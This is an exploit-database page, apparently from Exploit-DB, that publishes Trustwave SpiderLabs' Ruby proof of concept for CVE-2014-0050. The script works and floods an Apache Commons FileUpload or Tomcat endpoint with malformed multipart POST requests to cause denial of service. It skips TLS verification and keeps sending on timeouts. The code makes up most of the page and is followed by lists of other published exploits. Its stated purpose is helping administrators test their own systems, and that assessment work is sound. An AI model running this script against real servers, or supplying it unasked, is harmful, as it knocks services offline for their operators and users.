Menu

Search for hundreds of thousands of exploits

"Apache Commons FileUpload and Apache Tomcat - Denial of Service"

Author

Exploit author

"Trustwave's SpiderLabs"

Platform

Exploit platform

multiple

Release date

Exploit published date

2014-02-12

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
#################################################################################
# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service	#
# 																				#
# Author: Oren Hafif, Trustwave SpiderLabs Research								#
# This is a Proof of Concept code that was created for the sole purpose 		#
# of assisting system administrators in evaluating whether their applications 	#
# are vulnerable to this issue or not											#
#  																				#
# Please use responsibly.														#
#################################################################################


require 'net/http'
require 'net/https'
require 'optparse'
require 'openssl'


options = {}

opt_parser = OptionParser.new do |opt|
  opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"
  opt.separator  ""
  opt.separator  "Options"
  opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|
    options[:url] = url
  end

  opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|
    options[:number_of_requests] = number_of_requests
  end

  opt.on("-h","--help","help") do
  	puts ""
    puts "#################################################################################"
	puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service   #"
	puts "#                                                                               #"
	puts "# Author: Oren Hafif, Trustwave SpiderLabs Research                             #"
	puts "# This is a Proof of Concept code that was created for the sole purpose         #"
	puts "# of assisting system administrators in evaluating whether or not               #"
	puts "# their applications are vulnerable to this issue.                              #"
	puts "#                                                                               #"
	puts "# Please use responsibly.                                                       #"
	puts "#################################################################################"
    puts ""
    puts opt_parser
    puts ""
  
	exit
  end
end

opt_parser.parse!


uri = ""
begin
	uri = URI.parse(options[:url])
rescue Exception => e
	puts ""
	puts "ERROR: Invalid URL was entered #{options[:url]}"
	puts ""
    puts opt_parser
    exit
end

number_of_requests = 10;
if(options[:number_of_requests] != nil)
	begin
		number_of_requests = Integer( options[:number_of_requests] )
		throw Exception.new if number_of_requests <= 0 
	rescue Exception => e
		puts e
		puts ""
		puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"
		puts ""
	    puts opt_parser
	    exit
	end
end

#uri = URI.parse(uri)


puts ""
puts "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."
i=10
i.times { print "#{i.to_s}...";sleep 1; i-=1;}
puts ""


number_of_requests.times do 
	begin
	puts "Request Launched"
	https = Net::HTTP.new(uri.host,uri.port)
	https.use_ssl = uri.scheme=="https"
	https.verify_mode = OpenSSL::SSL::VERIFY_NONE
	req = Net::HTTP::Post.new(uri.path)
	req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")
	req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")
	req.body = "b"*4097
	https.read_timeout = 1 
	res = https.request(req)
	rescue Timeout::Error=>e
		puts "Timeout - continuing DoS..."
	rescue Exception=>e
		puts e.inspect
	end
end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2018-05-04 "IceWarp Mail Server < 11.1.1 - Directory Traversal" webapps php "Trustwave's SpiderLabs"
2017-01-30 "NETGEAR Routers - Password Disclosure" webapps hardware "Trustwave's SpiderLabs"
2015-08-27 "Oracle GlassFish Server 4.1 - Directory Traversal" webapps multiple "Trustwave's SpiderLabs"
2014-02-12 "Apache Commons FileUpload and Apache Tomcat - Denial of Service" dos multiple "Trustwave's SpiderLabs"
2014-02-11 "Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection" webapps windows "Trustwave's SpiderLabs"
2014-01-24 "Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow" remote windows "Trustwave's SpiderLabs"
2014-01-24 "Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2013-09-17 "Vino VNC Server 3.7.3 - Persistent Denial of Service" dos linux "Trustwave's SpiderLabs"
2013-09-10 "AjaXplorer 1.0 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2013-08-07 "McAfee SuperScan 4.0 - Cross-Site Scripting" webapps windows "Trustwave's SpiderLabs"
2013-08-02 "MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2013-08-02 "INSTEON Hub 2242-222 - Lack of Web and API Authentication" webapps hardware "Trustwave's SpiderLabs"
2013-08-02 "Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities" local hardware "Trustwave's SpiderLabs"
2013-01-16 "Oracle Application Framework - Diagnostic Mode Bypass" webapps jsp "Trustwave's SpiderLabs"
2012-10-24 "Bitweaver 2.8.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2012-04-19 "Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities" webapps multiple "Trustwave's SpiderLabs"
2012-01-25 "WordPress 3.3.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2011-06-23 "IBM Web Application Firewall - Bypass" remote windows "Trustwave's SpiderLabs"
2011-02-06 "Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities" remote hardware "Trustwave's SpiderLabs"
2010-12-12 "Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Undocumented Default Accounts" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Authentication Bypass" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Directory Traversal" remote hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow" dos hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Denial of Service" dos hardware "Trustwave's SpiderLabs"
2010-09-24 "FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution" webapps php "Trustwave's SpiderLabs"
2010-08-03 "EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export" remote hardware "Trustwave's SpiderLabs"
2009-05-24 "Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting" remote hardware "Trustwave's SpiderLabs" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected